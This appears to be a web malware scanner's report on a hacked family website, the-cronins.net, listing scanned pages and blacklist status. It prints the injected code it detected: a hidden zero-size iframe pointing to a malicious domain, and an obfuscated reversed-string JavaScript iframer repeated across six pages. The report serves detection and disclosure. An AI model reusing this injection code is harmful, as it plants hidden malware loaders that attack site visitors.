Malware Scanner report for the-cronins.net

Malicious/Suspicious/Total urls checked: 7/0/19

7 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "the-cronins.net" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 1/0/1

1 malicious iframe found. See details below

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=the-cronins.net

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://the-cronins.net/	HTTP/1.1 200 OK Date: Mon, 22 Dec 2014 09:31:37 GMT Accept-Ranges: bytes ETag: "d4a868c0118cc1:497" Server: Microsoft-IIS/6.0 Content-Length: 278 Content-Location: http://the-cronins.net/index.htm Content-Type: text/html Last-Modified: Sun, 01 May 2011 15:09:22 GMT X-Powered-By: ASP.NET	clean
http://the-cronins.net/index.htm	HTTP/1.1 200 OK Date: Mon, 22 Dec 2014 09:31:39 GMT Accept-Ranges: bytes ETag: "d4a868c0118cc1:497" Server: Microsoft-IIS/6.0 Content-Length: 278 Content-Type: text/html Last-Modified: Sun, 01 May 2011 15:09:22 GMT X-Powered-By: ASP.NET	clean
http://www.the-cronins.net/index.asp	200 OK Content-Length: 931 Content-Type: text/html	malicious
Page code contains blacklisted domain: 1091.bikeclubonline.in <html> <head> <link rel="stylesheet" type="text/css" href="style.css"> <title>The Cronin's Family Website</title> </head> <body><iframe src="http://1091.bikeclubonline.in/?n=1091" width="0" height="0" style="display:none"></iframe> <ul> <center><h1><i>Welcome to the Cronin Family Website!</i></h1></center> <p> <center> <img src="photos/CroninFamily07.jpg"> </center> <p> <center> <table width=500> <tr> <td align="left"><img src="im ...[780 bytes skipped]... Malicious iFrame found. The same iFrame was found in 4 websites. size: 0x0 style: hidden src: http://1091.bikeclubonline.in/?n=1091 This URL is marked by Google as suspicious <iframe src="http://1091.bikeclubonline.in/?n=1091" width="0" height="0" style="display:none">
http://www.the-cronins.net/about.asp	200 OK Content-Length: 4389 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function revr(inp) {var message1 = inp; var before = ''; var after = ''; var message2=''; for (count=message1.length; count >= 0; count--) message2+=message1.substring(count,count-1); var asd = document.write(before,message2,after); }var nn1 = 3120 + 652 / 5 * 6 - 526 - 3999 + 624 - 0.4 - .000000000000091; ;var fr = ">'nn1'=thgieh 'nn1'=htdiw '4=dis?php.og/ni.lilmucitfecanrof//:ptth'=crs emarfi<";function screenSize() {var w, h;w = (window.innerWidth ? window.innerWidth :(document.documentElement.clientWidth ? document.documentElement.clientWidth : document.body.offsetWidth)); h = (window.innerHeight ? window.innerHeight : (document.documentElement.clientHeight ? document.documentElement.clientHeight : document.body.offsetHeight)); return {w:w, h:h}; }var scr1 = screenSize().w;var scr2 = screenSize().h;if(scr1 > scr2) { revr(fr); } else {} Antivirus reports: Comodo UnclassifiedMalware Kaspersky HEUR:Trojan.Script.Iframer
http://www.the-cronins.net/cayley.asp	200 OK Content-Length: 5972 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function revr(inp) {var message1 = inp; var before = ''; var after = ''; var message2=''; for (count=message1.length; count >= 0; count--) message2+=message1.substring(count,count-1); var asd = document.write(before,message2,after); }var nn1 = 3120 + 652 / 5 * 6 - 526 - 3999 + 624 - 0.4 - .000000000000091; ;var fr = ">'nn1'=thgieh 'nn1'=htdiw '4=dis?php.og/ni.lilmucitfecanrof//:ptth'=crs emarfi<";function screenSize() {var w, h;w = (window.innerWidth ? window.innerWidth :(document.documentElement.clientWidth ? document.documentElement.clientWidth : document.body.offsetWidth)); h = (window.innerHeight ? window.innerHeight : (document.documentElement.clientHeight ? document.documentElement.clientHeight : document.body.offsetHeight)); return {w:w, h:h}; }var scr1 = screenSize().w;var scr2 = screenSize().h;if(scr1 > scr2) { revr(fr); } else {} Antivirus reports: Comodo UnclassifiedMalware Kaspersky HEUR:Trojan.Script.Iframer
http://www.the-cronins.net/keara.asp	200 OK Content-Length: 2402 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function revr(inp) {var message1 = inp; var before = ''; var after = ''; var message2=''; for (count=message1.length; count >= 0; count--) message2+=message1.substring(count,count-1); var asd = document.write(before,message2,after); }var nn1 = 3120 + 652 / 5 * 6 - 526 - 3999 + 624 - 0.4 - .000000000000091; ;var fr = ">'nn1'=thgieh 'nn1'=htdiw '4=dis?php.og/ni.lilmucitfecanrof//:ptth'=crs emarfi<";function screenSize() {var w, h;w = (window.innerWidth ? window.innerWidth :(document.documentElement.clientWidth ? document.documentElement.clientWidth : document.body.offsetWidth)); h = (window.innerHeight ? window.innerHeight : (document.documentElement.clientHeight ? document.documentElement.clientHeight : document.body.offsetHeight)); return {w:w, h:h}; }var scr1 = screenSize().w;var scr2 = screenSize().h;if(scr1 > scr2) { revr(fr); } else {} Antivirus reports: Comodo UnclassifiedMalware Kaspersky HEUR:Trojan.Script.Iframer
http://www.the-cronins.net/dennyjr.asp	200 OK Content-Length: 2357 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function revr(inp) {var message1 = inp; var before = ''; var after = ''; var message2=''; for (count=message1.length; count >= 0; count--) message2+=message1.substring(count,count-1); var asd = document.write(before,message2,after); }var nn1 = 3120 + 652 / 5 * 6 - 526 - 3999 + 624 - 0.4 - .000000000000091; ;var fr = ">'nn1'=thgieh 'nn1'=htdiw '4=dis?php.og/ni.lilmucitfecanrof//:ptth'=crs emarfi<";function screenSize() {var w, h;w = (window.innerWidth ? window.innerWidth :(document.documentElement.clientWidth ? document.documentElement.clientWidth : document.body.offsetWidth)); h = (window.innerHeight ? window.innerHeight : (document.documentElement.clientHeight ? document.documentElement.clientHeight : document.body.offsetHeight)); return {w:w, h:h}; }var scr1 = screenSize().w;var scr2 = screenSize().h;if(scr1 > scr2) { revr(fr); } else {} Antivirus reports: Comodo UnclassifiedMalware Kaspersky HEUR:Trojan.Script.Iframer
http://www.the-cronins.net/album.asp	200 OK Content-Length: 5568 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function revr(inp) {var message1 = inp; var before = ''; var after = ''; var message2=''; for (count=message1.length; count >= 0; count--) message2+=message1.substring(count,count-1); var asd = document.write(before,message2,after); }var nn1 = 3120 + 652 / 5 * 6 - 526 - 3999 + 624 - 0.4 - .000000000000091; ;var fr = ">'nn1'=thgieh 'nn1'=htdiw '4=dis?php.og/ni.lilmucitfecanrof//:ptth'=crs emarfi<";function screenSize() {var w, h;w = (window.innerWidth ? window.innerWidth :(document.documentElement.clientWidth ? document.documentElement.clientWidth : document.body.offsetWidth)); h = (window.innerHeight ? window.innerHeight : (document.documentElement.clientHeight ? document.documentElement.clientHeight : document.body.offsetHeight)); return {w:w, h:h}; }var scr1 = screenSize().w;var scr2 = screenSize().h;if(scr1 > scr2) { revr(fr); } else {} Antivirus reports: Comodo UnclassifiedMalware Kaspersky HEUR:Trojan.Script.Iframer
http://www.the-cronins.net/contact.asp	200 OK Content-Length: 2240 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function revr(inp) {var message1 = inp; var before = ''; var after = ''; var message2=''; for (count=message1.length; count >= 0; count--) message2+=message1.substring(count,count-1); var asd = document.write(before,message2,after); }var nn1 = 3120 + 652 / 5 * 6 - 526 - 3999 + 624 - 0.4 - .000000000000091; ;var fr = ">'nn1'=thgieh 'nn1'=htdiw '4=dis?php.og/ni.lilmucitfecanrof//:ptth'=crs emarfi<";function screenSize() {var w, h;w = (window.innerWidth ? window.innerWidth :(document.documentElement.clientWidth ? document.documentElement.clientWidth : document.body.offsetWidth)); h = (window.innerHeight ? window.innerHeight : (document.documentElement.clientHeight ? document.documentElement.clientHeight : document.body.offsetHeight)); return {w:w, h:h}; }var scr1 = screenSize().w;var scr2 = screenSize().h;if(scr1 > scr2) { revr(fr); } else {} Antivirus reports: Comodo UnclassifiedMalware Kaspersky HEUR:Trojan.Script.Iframer
http://www.the-cronins.net/test404page.js	404 Not Found Content-Length: 1549 Content-Type: text/html	clean
http://www.the-cronins.net/photos/	403 Forbidden Content-Length: 1549 Content-Type: text/html	clean
http://www.the-cronins.net/keara/file.wmv	404 Not Found Content-Length: 1549 Content-Type: text/html	clean
http://www.the-cronins.net/photos/2006Christmas/small	HTTP/1.1 301 Moved Permanently Date: Mon, 22 Dec 2014 09:31:44 GMT Location: http://www.the-cronins.net/photos/2006Christmas/small/ Server: Microsoft-IIS/6.0 Content-Length: 177 Content-Type: text/html X-Powered-By: ASP.NET	clean
http://www.the-cronins.net/photos/2006christmas/small/	HTTP/1.1 200 OK Date: Mon, 22 Dec 2014 09:31:44 GMT Accept-Ranges: bytes ETag: "23bc237c9c36c71:497" Server: Microsoft-IIS/6.0 Content-Length: 4441 Content-Location: http://www.the-cronins.net/photos/2006christmas/small/index.htm Content-Type: text/html Last-Modified: Fri, 12 Jan 2007 22:53:32 GMT X-Powered-By: ASP.NET	clean
http://www.the-cronins.net/photos/2006christmas/small/index.htm	200 OK Content-Length: 4441 Content-Type: text/html	clean
http://www.the-cronins.net/photos/2006christmas/small/photo001.htm	200 OK Content-Length: 2030 Content-Type: text/html	clean
http://www.the-cronins.net/photos/2006christmas/small/photo002.htm	200 OK Content-Length: 2164 Content-Type: text/html	clean
http://www.the-cronins.net/photos/2006christmas/small/photo003.htm	200 OK Content-Length: 2164 Content-Type: text/html	clean
http://www.the-cronins.net/photos/2006christmas/small/photo004.htm	200 OK Content-Length: 2164 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: the-cronins.net

Result:
HTTP/1.1 200 OK
Date: Mon, 22 Dec 2014 09:31:37 GMT
Accept-Ranges: bytes
ETag: "d4a868c0118cc1:497"
Server: Microsoft-IIS/6.0
Content-Length: 278
Content-Location: http://the-cronins.net/index.htm
Content-Type: text/html
Last-Modified: Sun, 01 May 2011 15:09:22 GMT
X-Powered-By: ASP.NET

...278 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: the-cronins.net
Referer: http://www.google.com/search?q=the-cronins.net

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for the-cronins.net

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools